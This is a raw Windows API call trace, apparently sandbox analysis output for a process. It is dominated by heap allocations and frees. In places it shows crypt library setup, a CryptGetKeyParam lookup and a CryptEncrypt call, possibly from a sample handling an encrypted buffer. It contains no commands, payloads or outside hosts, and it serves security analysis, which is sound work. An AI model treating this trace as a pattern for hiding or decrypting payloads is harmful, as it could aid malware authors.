RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d02b0 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d06e8 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0116.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0116.875] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0116.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0116.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0116.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0116.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0116.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0116.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0116.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0116.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0116.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0116.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0116.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d06e8 | out: hHeap=0x1780000) returned 1 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0116.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0116.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0530 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0116.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0116.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0116.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0116.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0116.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0116.879] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d05a8 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0378 | out: hHeap=0x1780000) returned 1 [0116.879] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2980, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2980*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0116.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03a0 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0116.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.881] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 1 [0116.881] TranslateMessage (lpMsg=0x144e18c) returned 0 [0116.881] DispatchMessageW (lpMsg=0x144e18c) returned 0x0 [0116.881] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0116.881] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0116.881] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.882] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.882] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0116.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0116.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0116.883] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0116.883] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.883] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0116.883] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.883] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0116.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caec8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0116.883] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x708a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x7090) returned 1 [0116.883] RtlAllocateHeap 